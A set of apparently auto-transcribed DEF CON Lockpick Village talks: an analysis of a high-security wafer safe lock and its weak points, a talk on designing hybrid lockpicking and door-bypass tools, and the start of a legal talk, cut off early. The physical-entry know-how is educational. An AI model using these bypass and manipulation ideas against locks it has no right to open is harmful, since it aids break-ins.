manipulate two wafers at a time. That would make it phenomenally difficult to position each one of them individually correctly. So you'd be in a bit of a bind in terms of how to handle this ramp. The last option would be to create a half height ramp and make your tool a little bit smaller than the total space that you've got. But again, that's not really ideal. Then we've got these angled cuts, which to the best of my knowledge are just there to make key duplication harder, because, as I mentioned, way back near the beginning of the talk, key duplication is one of the possible methods of surreptitious entry. So for a high-security lock, you want to make key duplication as difficult as possible. So those angled cuts look like they're about 45 degrees. I haven't measured, but they look like they're about 45 degrees, and they make key duplication much harder. There's also this weird angled cut. If you look closely, you can see that each of these other cuts on the key are horizontal, except this one. And this one actually cuts across more than one wafer and engages a flexible portion on the corresponding wafer, which I believe is wafer 9 in this particular case. Again, I believe this is for key duplication, because from what Yaakov said about chroma protectors that he's looked at, it's not been necessary to have that cut on a tool, and that's also definitely the case for my lock. But still, it's another interesting feature that would make duplication as key very, very tricky. I've got these partial radial cuts, which cut into the bitting of the key, but not all the way through. And again, there's a potential there to make key duplication much harder if they truly need to be cut out in order to allow correct alignment of the wafer. You could probably in most cases get away with this and not worry about it if you were designing a tool to manipulate the wafer, but this is yet another thing to worry about if you were going to try and copy one of these keys. Then we've got what is probably the most interesting feature, I would say, on the lock, or sorry, on the key for me, which is this undercut. And this undercut is a cut that's made so deeply that it cuts into the actual shank of the key. And so when you insert the key, the particular portion of the wafer that engages with this undercut first has to meet this ramp, and so you need this sort of slot on the key. And if it's able to, it'll travel all the way up, and it'll stop when the key is fully seated in line with the undercut. And then as you turn the key, the undercut will pass through the interposition. Now, that doesn't actually mean that you couldn't design a tool that uses the whole shank space, but you could design the undercut to cut so deeply that it even cuts all the way through to the post. And if you did that, the key would have a hole in it, which wouldn't be a big deal for the key because it's solid, and that would only be one tiny weak point that would be relatively well supported. But if you were going to design a tool and that undercut could be in any position, well, that's a tricky problem to design around, and it would multiply the number of tools that you would reasonably need in order to open this lock. Now, remember, you'd need to line one of those wafers up correctly in order to tension the lock anyway. So you'd need seven different tips on your tool, and you might need several different shafts, and it might not be possible to create those separately and viably, so assuming you had seven different ends and 11 wafers where that undercut could exist, well, that's 77 different tools that you'd need to bring on a job of which only one of them will work. So this is a huge exaggeration of the problem, which would hugely increase the amount of time it would take in order to reliably manipulate open one of these locks, even if you did have a tool that could do it. And finally, we have this dimpled cut. Now, Jaco didn't actually have an answer to this in his talk as to what it's there for. And I should point out, I am not an expert on this lock. That title almost certainly belongs to some German safe mechanic. But I can offer a theory. And that theory is that the fourth wafer in the Chromal Protector handles counter-rotation. So the Chromal Protector handles counter-rotation by allowing essentially the full movement of the key to about 45 degrees within the lock. And so at any point that you are opening the lock, you can turn the key back basically the whole way, back basically 45 degrees. If you do that, then what you'll find is that the fourth wafer, in this particular case, makes it cut so that it makes contact with both sides of the keys simultaneously. And that wafer handles the counter-rotation of the core, which is the missing element in the lock that I created. However, if you don't have this dimpled cut on the surface of the key, then what happens when you attempt to turn the key backwards in the lock is that you actually make contact with a protrusion on wafer number 9 before the key makes contact on two points with wafer number 4. And so exactly the same, at least in theory, as with my lock. You'd be trapped in a position where you only have one point of contact with any wafer in the lock. And so you can't easily counter-rotate the lock because the harder you turn backwards, the harder you force the wafer against the side of the housing and the grates of the frictional forces. So my theory is that this is another trap when it comes to key duplication, where if you failed to replicate that sufficiently well, what would happen is that even though you may have a key that opens the lock, you then wouldn't be able to remove the key from the lock. And so the key would remain inside the lock and the lock would still be tamper-evident, even though it had been successfully defeated, which is one of the requirements for a high-security lock. Just taking a... so to move away from the key and back to the lock, let's take a look at the keyway. There is no core that you can tension off. This is a solid plate that's held in with three screws. There is no way to tension the lock directly around the keyway, and in the center you can see the poster, which matches the hole in the key. And you can start to see some of the different shapes of the wafers through the keyway. Here it is with that top layer taken off. And so we can see the top layer, layer 11, which is one of those split wafers. And it's the only wafer or set of wafers in this lock, the only layer that isn't actually sprung. And we can kind of see, looking down, that we have here's the little portion that sticks out that engages with the ramp. And this little slightly curved portion is the portion that engages with the weird angled cut. And you can sort of see that every single wafer all the way down is very differently shaped. And so, as a result, it's very, very difficult to look at them and try and discern any kind of meaningful pattern in order to decode which position that wafer might need to be placed in, in order to open the lock. Having now covered the basic idea behind the wafers and without digging too much into how each of them works, there are two wafers that I'm going to draw particular focus to. The first wafer is number seven in my lock, which has a square cut out in one corner of the wafer end. This effectively acts a bit like a full skate does on traditional slide locks, albeit less effectively. And this is one of the reasons why I think full skates, spooling and serrations aren't so simple when it comes to wafer locks. For this cut out to have an effect, all the other wafers would first have to be set correctly, and then the core will turn partially and stop getting caught in this cut out. Sounds like it'd hamper an attacker pretty effectively, right? Except there's no way for the other wafers to counter rotate the core. The wafer itself supplies no counter rotation either, because it can't with the notch squared off. And what this means is that an attacker needs only to keep pushing on the wafers until they finally fall into place. They can't lose progress towards getting the lock open, they can only really gain progress. So, that was the boring detail of the two. The other one reveals what I think personally is the Achilles heel of all wafer locks designs tension of the wafers. And yes, I think the high security, but I still think they do have a fundamental problem, and it's a very difficult one to grapple with. And I think that problem is essentially getting the lock to counter rotate open again when you're using those wafers to tension the lock to open it. I mean, of course I think that, right? Because that's the design feature that I overlooked in my own design, right? But I then did a lot of thinking about how to solve that problem. So, the animation on the left here is the most obvious and basic approach to solving that problem. You've kind of got this like bow tie or hourglass style cut out. And essentially, any bit on the key, when turned, in this case 45 degrees, will begin to tension the lock. And as long as nothing blocks the key when it's counter rotating, you can counter rotate or make contact with two surfaces again, and they'll counter rotate really smoothly. The only problem with this is this wafer doesn't have the freedom to move at all. And so it'll allow the lock to be tensioned trivially, which undoes the whole point in designing the lock to tension off the wafers in the first place. So, the way they've tried to do this in the Chroma is a little bit more complicated than that. If you take a look at the animation on the right-hand side, this is the exact same animation as the one on the left, just with a little bit more material cut away. It still functions in exactly the same way, but hopefully you can see the similarities between the animation on the right-hand side and wafer number four in my Chroma lock. The only difference between the animation on the right and the actual wafer in my lock is that in the top right-hand corner, they haven't given the same surface to tension off as in the animation. They've got a surface which the key needs to touch and move laterally into the correct position. But when you design the wafer this way, what you'll find is that the prong that sticks out here on the bottom right-hand side obstructs the keyway. And in fact, you might even be able to see this kind of darker portion on it where that surface has kind of been rubbed away a little bit or has become worn. And the reason for that is this is the portion of the wafer that makes contact with the ramp on the key. And so the real reason to have the ramp is to allow the key to enter the lock while not having to have this counter-rotation wafer already set in the correct position. Attacking wise though, these two surfaces on the key need to engage at the same time. So if you have any tool which is equally lengthed and you counter-rotate in the wrong direction deliberately, you will align this wafer correctly. And if you had some kind of method of then identifying how far away the surfaces that the key would have to make contact with in order to tension it clockwise, then you'd know the position, the correct position of at least one wafer and you could decode that. And that would allow you to tension the lock. So ultimately, is this lock impossible to breach or manipulate or pick? No, there have been reports of people managing it at least against some versions of the lock, even if there aren't any recordings on YouTube. But this is also a phenomenally high-security lock. It is hugely drill resistant, it uses a special plate right at the bottom of the keyway to add extra drill resistance on top of the already significant drill resistance of the plates that sit on top of the lock and effectively function as the faceplate. The kind of totally patternless way that most of the inside surfaces of all the wafers have been cut away means that it's incredibly difficult to decode. And in a best-case scenario, if you had a huge number of samples, thousands of these locks, then you'd be able to maybe carry out some kind of decoding. In a worst-case scenario, for the attacker at least, what will be happening at the factory is they will truly do something to randomize all of those shapes, and so there will never be a pattern, no matter how many samples you collect. There's no way for us to easily work out which one is the case. But it does seem like it would take a phenomenal amount of resources to work out how to decode one of these locks. I didn't really discuss the blow ring at all, but that's something to discuss. Around the back of the lock is a... if we can go back... oh boy, okay. That's a bit further than where to go back, right? So there we go. The brass ring that sits around the outer edge of this lock is the blow ring. And from my understanding, the way that it's designed is so that if you pack the middle of the lock through the keyway with explosive, which is one of the big downsides of keyed safe locks is that you can pack them full of explosive. When you detonate that explosive to create high pressure to tear the lock apart, rather than the entire lock completely tearing itself to pieces, what happens instead is the blow ring gives way under the high pressure before the lock actually does dismantle itself, since the blow ring is much softer metal than the rest of the body. And so what will happen is you'll end up fusing together all the various wafers in the middle into one horrible blob, and the lock won't be opened. So at that point, the only option would be to completely obliterate the lock. And considering this is normally used in high security containers or vaults, this sort of thing, that means you have to go through the entire surface of that vault or container, which will be no easy feat. So, and that brings me on to the final point, which is the super, super tight tolerances. So I've attempted to manipulate my lock with the face cover removed and applying direct tension to the core, which obviously is cheating, right? You wouldn't be able to do that if the lock were actually installed in a container. But even doing that, even basically ignoring the main security feature that the lock has, and attempting to manipulate it like that, the tolerances are so incredibly tight that with even more than two or three wafers, I can't manipulate the lock and have the wafers hold in place even when they bind. They do bind and it's possible to detect that with enough force, and it's possible to move them into position, but they drop really, really easily, which makes it phenomenally hard to manipulate. And all in all, I would say this is a phenomenally secure lock, and it largely achieves the goals that high security locks have. And it's a wafer lock. So clearly there is some potential for wafer locks to provide security that we're looking for in high security locks in a way that isn't perhaps as inherent to, for example, pin tumble locks. I can't think of a pin tumble lock that has a comparable challenge with tensioning or manipulation. So there we go. Hopefully I've convinced you that while lots of wafer locks are low security, the wafer lock principle itself, especially when you have the key tension, the wafers, which then tensions the core, is actually really, really quite high security, and it's got great potential to deliver a much higher security solution than other types of lock design. So hopefully you learned something. Hopefully I convinced you. And I presume now we will lead into the question and answer section. Thank you very much.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50746 (DOI)
All right, welcome to my presentation. This is Hybrid Physic Tools. Best of both worlds are just weird. This part of Tools Lockpick Village for DefCon28. My name is Didimus. So I always like to start out with an agenda so we kind of know where we're going with the conversation, as well as if you come back and watch this recording or view these slides, then you know kind of bookmark where different things were. So we're going to start out, talk about what are Physic Tools, what do we use them for, and then why? Why are we looking into the whole hybrid concept and is there even a need? And then what about Physic Tools, what's already out there, what are some ideas that work, what don't work, and then we'll go to the how. So this is something I'm interested, how do I start or what would I do if this is something that speaks to me that I'm kind of interested in. So with that, we'll launch right into it. Little bit about me, I'm Didimus. I've been picking locks for about 13 years. I picked it up when I was in college. I had a locksmith uncle who taught me a lot of the things and just went from there. My favorite pick is DeForest Offset, and my least favorite pick is this thing. My day job, I'm a security engineer for a technology company on their security operations and engineering team, and I'm a lockpick enthusiast, and I'm also happily married and a father of four children. All right, launching into it. So what are Physic Tools? First of all, when I say Physic, I mean physical security. I mostly say that because I don't want to have to say physical security tools in many times in this presentation. So if you think about it, any tools that are used to test and or compromise physical security, I made up this definition, but that's the basic gist of it. So a few examples of this that you may or may not be familiar with. If you're watching this presentation, you're most likely familiar with it. So things like lockpicks, bypass tools, drivers, jigglers, shims, etc. are all examples of Physic Tools. A couple of weird examples, not so much weird, maybe just a bit different or maybe things that you might not consider as physical security tools are things like multi tools, your standard Gerber, Leatherman, Sog type things, wedges. These could be aluminum. These could be the air compressed wedges as well as compressed air. These are the cans that clean your keyboard and computer parts. And then Film Reel. You can actually use Realtreel, Theater, Film Reel to compromise certain types of doors. Check out Pope. Dave's got a few videos talking about this as well. Some awesome examples. So things like the thumb latch tool. If you don't know what this is, you should definitely check it out. It's a really neat tool, extremely useful, especially with double doors and things like that. And then the under the door tool. I don't know a single physical security pen tester who does not have an under the door tool. They are a must have. They make the job very easy and very nice to have. And then there's the stuff that works in the pinch. So this would be like your standard Bobby pins, paper clips, safety pins, stuff you find around. Like you could take a pop bottle and cut it and then you have something that you could shim with. This would be, you know, kind of the MacGyver method, I guess you could say. So let's talk hybrid for a minute. Hybrid tools, the way I'm interpreting them is like, when typically there's one tool that's used traditionally to manipulate a lock or bypass a latch or a door or something like that. But a hybrid tool is like, there's more than one use for it. Instead of just the very specific one. I didn't want to use the word multi tool in this presentation because I didn't want to confuse it with actual multi tools your Leatherman your Gerber's your things like that. Also, I do want to get this disclaimer out right here at the beginning but hybrid doesn't always mean better. And what I mean by that is, just because it can do two things it doesn't mean it can do two things really well. And over years ago I was thinking about getting a motorcycle but I wanted something that I could ride and have it be street legal, but I could also go dirt biking in the mountains. I was talking to some of my friends and they said, yeah, you could totally do that. It's going to suck at both of them though. So it's better to get something more specific. But that's not always the case. Sometimes something that can do two things is still good at two things. It can't be as well. So the kind of have this dichotomy of you have this super specific exact tool for this exact situation. You want that or possibly compromise to have something that is more versatile, maybe not be the exact perfect one you would use, but you're trained you use it, and you can do more or the less kind of philosophy. And I'm talking about hybrid tools. There's a picture of a couple here where you have like a top of the key way tensioner here, as well as a tubular tensioner, and then a comb pick, you know, there's there's space on that. It's three tools and one it's small it's slim it's compact. And another one is a double sided pick. And also creativity. This kind of a way various people can express their creativity. You know, someone will like it. There's always trolls someone will hate it but someone will always like it is what I've discovered. So now we get to the why. So why would you want to do this. Well, it comes back to that. Can I do more with less. I like to think of the example where let's say you're doing a physical. You're doing a physical engagement and you're going in during business hours like yeah after hours take your full tactical bag you know and everything but if you're going in trying to masquerade as an employee or tailgate or something like that. You can't go in with your whole kit you can't walk in like a suit and tie and then you have a 511 Molly tactical backpack with all of your goodies and your go bag and everything in it. And then you can take out so sometimes you need like custom tools. A lot of times physical pen testers will actually have custom tools for these types of situations. Again, creativity. This is a great way to do it. I'm not a developer. You know, you come to Def Con. A lot of people have these brand new zero days and metasploit modules and things like that. I'm not a programmer but I like designing things. I'm more of a physical tool kind of person. I like the actual creating something to hold it in your hand. And another thing like it could lead to better tools overall and we're going to have a couple examples of that coming up. You know, your silly idea might be the tool the locksmiths and locksport enthusiasts have been wanting, but you just didn't know. So some things that inspire me. I really like spy stuff. I like, I like the James Bond films. I like the International Spy Museum in Washington DC. I'd recommend, you know, when you can check it out. It's well worth it. Also, I like the the Sears stuff. So the survival evasion resistance escape type stuff. So this first thing here at the top is an actual titanium escape ring. It's Scott inside the ring. It has a saw blade. It has it also functions as a handcuff shim. And it's kind of cool. I don't have one myself, but I always thought that'd be kind of cool to have. Then the top right bottom left, these are two exhibits from the International Spy Museum. One is a jackknife from several years ago. And then in the bottom left, we have one of the first lockpick pens where the pigs were actually concealed inside the pen body. And then on the bottom right, we have an example of a Gerber multi tool that someone took and actually added lock picks to it. So in this person's everyday carry, he had a tensioner, he had a couple, you know, your go to lock picks, and there's instructables on that. You can go to instructables and find this and the link is in the notes as well. So let's talk about an improvement example. I really like Sparrow stuff. They're not sponsoring this or anything like this. I have a lot of their tools, but I do like Sparrow stuff. Some of the things they have over kind of looking over here on the left, we've got their wafer jigglers, their wafer picks, you know, four of them, they come on a key chain, they're really nice, they're good at getting in cabinet locks and some simpler locks and things like that. And then on the bottom left, you have your mini gym. This is something that I have a couple of I really like it. And then there in the middle, you have the Sparrow shank, which is used for decoding, as well as bypassing unshielded padlocks, different things like that. So you take these three different tools, three, you know, however many different tools, and they actually have a set called Sparrow's Dark Shift. So they created an expansion set for this. And here on the right, you have, you know, you have your standard slim gym, but they actually narrowed the handle down, kind of cut a few holes in it to give it a little bit lighter weight. And then you look at the next two tools, those are double-sided wafer picks that are, they have the exact same profile as the Sparrow's wafer is over on the left, but they're double-sided and take up less space. They're very skinny. In fact, I carry these in my wallet. Next, you have a Sparrow shank, which is shorter and has a bit wider handle, so maybe you can palm it better. And then this thing on the end is a hook rake pick that you can use both for single pin picking as well as for raking. It's called the Quick Strike. And from what I can tell, you can only get it in the Dark Shift expansion set. I really like it. It's fun. It's definitely worth looking into if you haven't played around with them before. And then a couple things, you know, first, it's a, you can use it as a hook or as a rake. And then they add these serrations. So starting with that left one, it's kind of hard to see in this picture, but they're actually very fine serrations. Part of the Dark Shift set that they made was so you could use it with or without gloves on. So having those serrations, especially in the dark, would be extremely valuable. Looking at the serrations on the two double-sided wafer picks, as well as the mini-gym, you can see those look a lot more pronounced and they actually look a little painful. They're really not that bad because they're flat on top. I'll be talking about serrations here in a little bit. But that's something where they took a couple of existing tools. How can we combine them, make them more useful, more versatile, smaller form factor, that kind of stuff. Another example. So this is the Tag 5 industry Scorpion lockpick set. This is something that I acquired a few years, a couple years ago. And you'll notice that it's your standard tumbler, sorry, your standard tension tools, as well as your standard picks. However, the handles are very different. Definitely check them out. The reason why is because these were designed by a government covert entry specialist. He worked, from what I understand, exclusively for the government agencies designing covert entry tools. Now, whereas with a standard lockpick, you hold it more like you would hold a pencil. These you actually hold kind of like you're holding a handle of some sort. Typically, when you're doing covert entry, you don't want to like go up to a door, get down on your knees and start working on the doorknob. This is something where you could actually stand up, hold it a different way and look way less conspicuous. This is something that he designed for government agencies and the like before coming in making them available to the public. They're really neat. They are different to get used to, but they are really, really nice. I'm a fan of them. And as I mentioned earlier, I'm a fan of International Spy Museum. They're actually featured in some of the exhibits. So let's talk about some hybrid tool examples. This is Locknub. If you don't follow Locknub on Twitter and on YouTube, I highly recommend it. He puts out great content. He's done a few collaborations. These are just three of the collaborations that he's done and then an interesting hybrid multi-tool that he designed. I could go and explain it, but he does a much better job. Definitely check out his stuff. But starting at the top left, we have the gut wrench. This is a locksmithing tool where when you would take apart cylinders and, you know, change out the pins and stuff, at times you would need like four or five different tools. And he thought, you know, why don't I just design one that has all of them in one. And I know locksmiths that actually use this because like I have one tool instead of having to rummage all over my workbench and find the right tool to fit the right cylinder and the right diameter and stuff. Moving over to the top right, this is a lock. I kind of think of it like a locksmith kit in a multi-tool. Like he designed it in such a way that it had various picks, a knife, a screwdriver, so you could take out Phillips head screws and things like that and like your standard American padlocks, place to put tensioners, tweezers, as well as plug followers. Again, these are YouTube videos. Check them out. He breaks it down way better than I could. Moving to the bottom right, you have the goat wrench. So this is where he took, where he took that tensioner that I showed earlier. And there's some tubular locks that it fits in. There's some that it doesn't. So he actually did a few prototypes, took some stock steel and designed his own. And then once he got the prototypes where he wanted, did a collaboration with sparrows and you can actually get the goat wrench today. And then finally on the bottom left, we have the sparrows Medusa. We'll have a bit close up here in a second. But I want you to point to notice that it's a pick that you can do single pin picking as well as raking with. All right. And now we get to the, or just plain weird. So remember back in 1999, James Bond movie, the world is not enough. He had to break into someplace. And so he had like this switchblade action credit card and he flipped it out. And, you know, I, I didn't pick locks at the time, but going back, looking at it, it's very interesting. I mean, it's kind of, we've got like some kind of S snake rate going on. And then on the backside, it's like a multi multiple ridge type raking lock. I don't know. It looked cool for Hollywood. And then here on the right, more practical from Johnny Depp's renditionist Sherlock Holmes, where he had various tryout lever lock. Warded style picks, which is interesting. So or just weird or practical or Hollywood. I don't know, but it is kind of interesting to see the stuff in media. So back to Locknium for a second. This is a YouTube video where he talked specifically about the Medusa and I kind of follow the same process he does. At least that he laid out in this video about designing new picks. So starts with sketches starts designing them. You know, here's what I kind of want. Here's what I want it to do and start, you know, it's a lot easier to make mistakes on pen and paper before you start making prototypes. So I started running through a couple different designs, what he was kind of thinking where he wanted to go with it. Once you get to that point, you can take the one you like, and then you start making your own custom prototypes, you can, you know, get some kind of rotary tool, create this yourself, or you could even switch it over to computer based modeling like CAD design, go from that. And then you tweak and work with your prototype until you have something that you really like, which eventually ended up being the Sparrow's Medusa. And of course, laser actually got this really beautiful artwork of this Medusa figure with the snakes and the hair and everything. It's a really, it's a really beautiful pick and it's also really functional. When in doubt laser etching is pretty cool. So where to begin this is something that's kind of interesting or maybe you've thought of a tool or something like that. So this is kind of the process I follow but it's like, you know, what am I trying to solve or improve upon kind of start there like start brainstorming. And I found that brainstorming always works best when I'm picking. So, and then ask yourself what's currently out there who's already done a lot of the work, like think of Sparrow's taking their own designs, and then tweaking them and making them better in the dark shift expansion. Then you get to the design and drawing phase, and then you start doing prototypes and testing and then, you know, you repeat that until you're happy with how your prototypes are. And then you moved to the production phase. So this is something I did a few years ago when I, when I came up with this crazy idea, like I wanted something sort of like a lockpick wallet card. That was more than a one time use like there's some that are good like tool makes a great one I like that. Once you break it out, you can actually put on a key chain it's useful. And there's some that, you know, they're definitely one time use. They're still good. They work in a pinch. But I wanted something that was like reusable and durable and stuff like that. And I was trying to think of, you know, the spy type stuff. So that's when I came up with like lockpick color stays. And I did the same process this is before I even followed lock new but it was like, I'm going to draw this out, you know, this is definitely a hybrid tool. It's different my color and it picks locks. And then I started taking actual color stays and cutting them up and trying to make useful picks out of them. At that point I started, I reached out to my brother in law who was a machinist we started cutting them up and trying them. And we started making them. And you can see these are like mark one and mark two prototypes where I had really sharp lines and things like that and wasn't really smooth and you know that s rake looks really dorky and I started tweaking the s rake and then the diamond picture looks ridiculous and so I worked on that. So still realize this is the first time I ever did something like this. It's kind of like, okay, it may not be good at both things but it's an interesting little spy gadget. What have you. So let's say you do that, get your prototypes working the way you want it. Now it's time for manufacturing and production. So I usually get my my raw materials from McMaster car. I like their website. You can order metal from there. It's very specific on the type, the gauge, the dimensions. You pay more for it, but it's actually been pretty good for me. As far as production, you can either design these all yourself. If you have that kind of time, or what I like to do, I actually pay someone. I have a metal shop that does precision laser. I can give them my CAD drawings. I can give them the metal and then they just charge me for thickness and laser runtime. So it's fairly affordable. And then as far as shipping, I've done it both ways. You know, you could have it like a Google forms or a Google sites type thing and once you fill it out, it sends you to a PayPal button PayPal handles all the shipping and post it just stuff like that. It works pretty well. So when I did my lock pick callers days, I did do a crowdfunding through Kickstarter. And it was definitely a learning experience. There's some pros and cons, but you know, this is all my opinion on it. You know, what's nice is it's a great platform to get your stuff out there. It handles all the campaigning the deadlines it reaches out to the buyers securely. They handle all the processing and stuff. It's great. There are some cons to it. Basically, you know, there's taxes, no matter how you do this, you should be paying taxes, right? If you make more than make if you from your backers get up to $20,000 raised, they give you tax forms. Otherwise, they're like, you take care of it yourself. And also, they're completely they can't be held liable in any way. If you don't fulfill on payments or things like that. And then, you know, when the campaign ends and you're funded, you don't immediately get the money. It's it could be anywhere from one to four weeks depending because they're gathering money from the backers on your behalf. And then, you know, so my advice, you know, figure out your design, your manufacturing production first, do not ever use funds for your own research and development and figuring out mistakes, because I don't know how thin your margins are. If you're doing a crowdfunding, but if they're thin and then you're using that money to figure out your mistakes, you're going to have a bad time. So, and then always be responsive. Reach out to people, you know, have a Twitter presence, whatever, and make sure you fulfill commitments. So these are my lockpick callers days I designed. These are actually the DEF CON 27 ones that I did. Did some like a limited edition like run of them and did some laser etching. So when in doubt, you know, lasers. So current projects that I'm working on, I kind of only have one right now I've had a bit more time because of COVID-19 and things like that. But a little bit of backstory. My wife and I moved into a new house in December and all of the internal doors had like different locks on them. Some were like the small flat head screwdriver. Some were like the push pin and some were even like cheap quick set handles. It was like, why are you putting this inside a house? And my kids would like lock these and close the door. So I got to the point where I was always carrying around a Sparrow's mini gym with me. And then sometimes it would be that quick set and I was like, okay, I pull out my, you know, my RCS jack and I for whatever, and I pick it open because I didn't have the key to it. I eventually replaced the door knobs and we ordered, you know, the little screwdriver keys for it. But I kind of got thinking like it'd be nice to have like a bypass tool that was like, you know, I can gym, but I can also use it to like quick pick or jiggle it open things. Also, I didn't want to carry a traveler's hook around in my pocket because that's really sharp and uncomfortable. So, all right, so let's take this process. This is where I'm currently at. I definitely wanted a bypass tool, something that I could latch slip or Lloyd with. I wanted a small form factor. I wanted something that I could take on an airplane if I needed like, there wasn't anything sharp or bladed. It was under seven inches reusable, durable, versatile, things like that. So I started looking at what was currently available. You know, we have your mini gym. I started thinking about common keys. You know, your CH 75 ones, and then auto jigglers, which you can use for more than just cars. Also the way for pics that we showed earlier, started thinking about the TSA 007 because that's the most common TSA key. And then like a shank or decoder type thing. And then we go to the design phase. So I'm a pen and paper kind of guy. What's nice about this is you can actually put the lock pick tools directly on the paper and trace it out. It's much easier than free handing it. So I started sketching out the ideas started thinking about the different kind of tools that I wanted. And then at that point I switched over to CAD. Now I've done both Libre CAD, which is an open source. It's, you can tell it's open source. Then I've also used auto desk fusion 360. It's great. It seems like it's a lot more developed. It is a paid service, but you can get it through like a student one or they do have a startup license if you make less than 100,000 type thing. So I started designing it. It was, it was really intuitive. I mean, I watched a couple of YouTube videos and some plural type courses on how to use it. It really got me going pretty quick. And so I designed a, you know, I took a mini gym on the one side, and then I wanted like a double sided wafer pick. And then I built in a little finger well, because I think it's important that tools are comfortable in the hand, you know, work on ergonomics. And then at that point you can extrude it out to the width and everything that you want. And then start working with the designs and stuff like that. So that's what I did. And then I designed three more. And these are my mark one prototypes. And I put a hole in it because I was thinking, you know, maybe want to land your hole or put this on a key chain or something like that. And so at the top, working our way down, we have our CH 751. And we have our double sided wafer pick. Then the next two are auto jigglers that you could use as a double sided auto jiggler or kind of like a, a dull kind of a shallower half diamond pick. You can't see it too well, but I did try to add serrations. My, my next one I need to, my next designs, I actually need to tweak this a little bit, kind of standardized the size of the, the mini gym side and things like that. I will say something about serrations. If you do put serrations in, they are nice. Make sure they're dull serrations. And the way I found that works pretty well for that is half circles with lines connecting them. They're really nice. You can fill them, but they don't cut into you. Don't do the saw tooth serrations. So something you should think about. So at this point, I have my mark one prototypes. I did a batch of about 100 of them. Well, no, I did a batch of like 40 sets or so. I sent them out to a couple people. I still have quite a few, but you can see a few things that I want to make some changes on. There was a little, in the way for picking, you can see a little half circle that was cut out there. That was just a mistake by the manufacturer. And you can see that the serrations didn't really come through. I didn't have a fine enough laser going. A couple ideas that I scrapped was like the TSA 007. The reason why is this is in 31 thousandths of an inch or a 0.787 millimeter steel. And the way the TSA 007 is set up, it's more like a Z shaped keyway. It just wasn't feasible. However, the CH751 works great. It's works perfect. I'm not going to change anything with that. I really like it. Also, I did decide to get rid of the decoder because if I want this to be TSA safe, I can't have a sharp spike on it. So next steps going to standardize the gym dimensions across all of them. I'm going to fix that weird circle. Change the fit profile on the wafer pick. Notice at the point there's actually two peaks on the top and the bottom makes it just a bit too thick. So I'm going to change those dimensions a little bit and then, you know, deeper, more pronounced serrations. All right. So kind of what I just said here, keep improving prototypes because I'm not happy how they are yet. But I do recommend you send them out to trusted friends who will give candid feedback. Don't send it out to positive people like, like, well, don't send out to people who only positive like, oh, this is so great. You're going to make a million dollars off this. So clever. Send out to people who like, know what they're talking about. Also, like, I can see the value of this. Here's something I would change. Here's how it fills in my hand. This is really valuable because then you're getting the feedback you want. If you're doing a crowdfunding type thing, you're not spending money on figuring this out. You know, I'm paying this up front, whatever. Raw materials manufacturing. I've already covered that. Things I like to do. And then once you're happy, is this a point where you want to reach out to lock that companies and look at some kind of a collaboration. Sparrows, I've reached out to them before they seem pretty good to work with. You know, I don't have any negative feelings against them. I decided not to go with them. Just make it on my own. But I know other people have had success with it and been happy with it. And I, you know, more power to them. Let's see. Yeah, I've already talked about how I hire a metal shop to laser cut them for me and send them to CAD files and they're really good with CAD and they can like, find out the most, the best layout to get the most out of my sheet metal and stuff and calculate costs and things like that. And then distribution. I mean, are you going to send this domestic or are you going to send it international? One thing I discovered is, I had all these international buyers in my caller state. So like, is this going to be customs friendly? And I didn't consider it and said, you know what? Yep. I could probably make a lot more money, but I'm going to cover customs because I don't want to be a jerk. But that's kind of the point you get to, you know, it's like, I want to make something good. I want people to be happy. Yes, some people are going to think it's dumb. They don't have to buy it. Some people are going to think, Hey, this is kind of cool. This is, this is clever. I mean, it's something might throw in my wallet or, you know, I like this kind of hybrid tool. It's really interesting. So that's, that's kind of where I'm at. And that is my talk pretty much. I'm on Discord. Go by Didimus. I'm also on Twitter. If you want to send me a DM, I think they'll be open for a little while, but same handle. And if you have any questions, I'd be happy to answer them as best I can. But, you know, I'm curious to see what, what kind of hybrid physics tools you might have out there, what ideas you might have. And yeah, if you have any questions, feel free to reach out and thanks for taking the time. So with that, I will say thanks and enjoy the rest of the con.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50747 (DOI)
Welcome, welcome everybody to a very unusual DEF CON. Lots of things are different. Lots of things are staying the same, including as always, the open organization of Lockpickers Lockpick Village. We're so glad you're here. We hope that you can learn some things, have some fun, walk out, more fired up about hacking and lockpicking than you arrived. My particular part of this today is law school for lockpickers. What even is that? Well, by way of background, I'm Preston Thomas, a former board member of Tool. I'm a licensed attorney barred in the District of Columbia and in California, which is importantly different than barred from DC in California. I've done this talk before, including at DEF CON. But 2020 has brought this topic into a new light. Security research of all kinds from hacking, reverse engineering, social engineering, lockpicking. These all rely on civil liberties of an open society with rule of law. Hacking is by nature subversive. Lockpicking is no different. Like journalists and priests and security researchers, our job is to comfort the afflicted and afflict the comfortable. We can do things many people don't understand. For certain types of people, encountering something they don't understand makes them nervous, irrational, maybe even angry. I should know. I've worked with Tool for almost 10 years and been a lawyer for longer. When people get nervous, irrational, or angry about lockpicking topics, it often ends up on my plate, falls to me to explain it. I've had this particular conversation hundreds of times. This talk today, it isn't for you. It's for me. I want to recruit all of you into my crusade to push back on the tide of bullshit about laws, and lockpicking, and how the two interact. I'm tired. I want to be done talking about this, but people won't let me. Help me. Please. Let's do this. To begin with, I am a lawyer. I am not however your lawyer. This is so, so not legal advice. The only advice I'm going to give you today is, don't get your legal advice from a guy at a con. Also, my opinions are my own. They don't represent Tool or anyone I work for, standard disclaimer. Law and Order was a great show because half was the cops and half was the lawyers. For the law part, you can just Google what the laws are in a specific jurisdiction, or how to talk to a law enforcement officer. There's great stuff on YouTube about that. This is not that talk. This talk is more the second part, the order part 